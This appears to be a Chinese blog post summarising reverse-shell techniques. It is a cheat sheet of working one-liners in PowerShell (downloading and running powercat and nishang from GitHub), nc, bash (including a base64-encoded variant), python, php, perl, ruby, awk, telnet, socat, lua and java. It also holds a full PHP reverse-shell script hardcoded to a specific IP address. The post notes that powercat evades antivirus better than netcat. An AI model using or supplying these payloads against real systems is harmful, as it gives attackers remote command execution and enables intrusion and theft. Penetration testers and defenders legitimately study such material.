zoukankan      html  css  js  c++  java
  • 反弹shell命令总结

    一.powershell 使用powercat反弹shell

    powercat是netcat的powershell版本,功能免杀性都要比netcat好用的多。被攻击端运行命令

    powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.1.4 -p 9999 -e cmd
    

    远程下载并执行powercat脚本,将cmd反弹到192.168.1.4 的9999端口,随后192.168.1.4使用nc 监听9999端口就能接收到shell

    二.powershell使用使用nishang框架反弹shell

    TCP流量
    远程下载无文件落地执行:

    powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.203.140 -port 6666
    

    本地执行:

    powershell Import-Module  .\invoke-powershelltcp.ps1; Invoke-PowerShellTcp  -Reverse -IPAddress x.x.x.x -port 8888
    

    Udp流量
    远程下载无文件落地执行:

    powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp  -Reverse  -IPAddress  10.1.1.210 -port 1234
    

    本地执行:

    powershell Import-Module  .\invoke-powershelludp.ps1; Invoke-PowerShellTcp  -Reverse -IPAddress x.x.x.x -port 8888
    

    三.nc反弹shell

    nc反向反弹shell

    nc ip 8888 -e /bin/bash  
    nc ip 8888 -e c:\windows\system32\cmd.exe
    

    nc正向反弹shell(将shell弹到本地端口,随后使用nc链接本地端口)
    nc -lvvp 7777 -e /bin/bash

    nc连接
    nc 192.168.242.129 7777

    四.Bash反弹

    bash -i >& /dev/tcp/ip/port 0>&1
    base64编码版
    bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNy4xMzUvNzg5MCAwPiYx|{base64,-d}|{bash,-i}'

    五.python反弹

    python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
    

    六.php反弹(sh)

    php -r '$sock=fsockopen("ip",port);exec("/bin/sh -i <&3 >&3 2>&3");'

    七.perl反弹

    Socket;$i="ip";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    

    不依赖/bin/sh:

    perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
    

    windows:

    perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
    

    八.ruby反弹

    ruby -rsocket -e'f=TCPSocket.open("ip",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
    

    不依赖/bin/sh:

    ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
    

    windows:

    ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
    

    九.php反弹shell(通用)

    <?php   
    error_reporting (E_ERROR);  
    ignore_user_abort(true);  
    ini_set('max_execution_time',0);  
    $os = substr(PHP_OS,0,3);  
    $ipaddr = '119.23.76.216';  
    $port = '1230';  
    $descriptorspec = array(0 => array("pipe","r"),1 => array("pipe","w"),2 => array("pipe","w"));  
    $cwd = getcwd();  
    $msg = php_uname()."\n------------Code by Spider-------------\n";  
    if($os == 'WIN') {  
        $env = array('path' => 'c:\\windows\\system32');  
    } else {  
        $env = array('path' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');  
    }  
     
    if(function_exists('fsockopen')) {  
        $sock = fsockopen($ipaddr,$port);  
        fwrite($sock,$msg);  
        while ($cmd = fread($sock,1024)) {  
            if (substr($cmd,0,3) == 'cd ') {  
                $cwd = trim(substr($cmd,3,-1));  
                chdir($cwd);  
                $cwd = getcwd();  
            }  
            if (trim(strtolower($cmd)) == 'exit') {  
                break;  
            } else {  
                $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);  
                if (is_resource($process)) {  
                    fwrite($pipes[0],$cmd);  
                    fclose($pipes[0]);  
                    $msg = stream_get_contents($pipes[1]);  
                    fwrite($sock,$msg);  
                    fclose($pipes[1]);  
                    $msg = stream_get_contents($pipes[2]);  
                    fwrite($sock,$msg);  
                    fclose($pipes[2]);  
                    proc_close($process);  
                }  
            }  
        }  
        fclose($sock);  
    } else {  
        $sock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);  
        socket_connect($sock,$ipaddr,$port);  
        socket_write($sock,$msg);  
        fwrite($sock,$msg);  
        while ($cmd = socket_read($sock,1024)) {  
            if (substr($cmd,0,3) == 'cd ') {  
                $cwd = trim(substr($cmd,3,-1));  
                chdir($cwd);  
                $cwd = getcwd();  
            }  
            if (trim(strtolower($cmd)) == 'exit') {  
                break;  
            } else {  
                $process = proc_open($cmd,$descriptorspec,$pipes,$cwd,$env);  
                if (is_resource($process)) {  
                    fwrite($pipes[0],$cmd);  
                    fclose($pipes[0]);  
                    $msg = stream_get_contents($pipes[1]);  
                    socket_write($sock,$msg,strlen($msg));  
                    fclose($pipes[1]);  
                    $msg = stream_get_contents($pipes[2]);  
                    socket_write($sock,$msg,strlen($msg));  
                    fclose($pipes[2]);  
                    proc_close($process);  
                }  
            }  
        }  
        socket_close($sock);  
    }  
    ?> 
    

    10.awk反弹

    awk 'BEGIN{s="/inet/tcp/0/192.168.99.242/1234";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
    

    11.telnet反弹

    备注:需要在攻击主机上分别监听1234和4321端口,执行反弹shell命令后,在1234终端输入命令,4321查看命令执行后的结果。

    telnet 192.168.99.242 1234 | /bin/bash | telnet 192.168.99.242 4321
    

    12.socat反弹

    socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.99.242:1234
    

    13.Lua反弹

    lua -e "require('socket');require('os');t=socket.tcp();t:connect('192.168.99.242','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
    

    14.java反弹

    public class Revs {
        /**
        * @param args
        * @throws Exception
        */public static void main(String[] args) throws Exception {
            // TODO Auto-generated method stub
            Runtime r = Runtime.getRuntime();
            String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.99.242/1234;cat <&5 | while read line; do $line 2>&5 >&5; done"};
            Process p = r.exec(cmd);
            p.waitFor();
        }
    }
    

    随后保存为java文件,编译并执行

    javac Revs.java
    java Revs
    
  • 相关阅读:
    HTTP协议简介
    Hadoop日记Day1---Hadoop介绍
    Linux日记Day3---Linux的文件属性与目录配置
    Hadoop日记Day4---去除HADOOP_HOME is deprecated
    Android 系统名字、版本、API level的对应关系
    win10搭建selendroid测试环境
    初识selendroid
    学习selendroid初衷
    Contos 安装nodeJs环境
    Failed to write HTTP message,Could not write JSON错误
  • 原文地址:https://www.cnblogs.com/supdon/p/13469216.html
Copyright © 2011-2022 走看看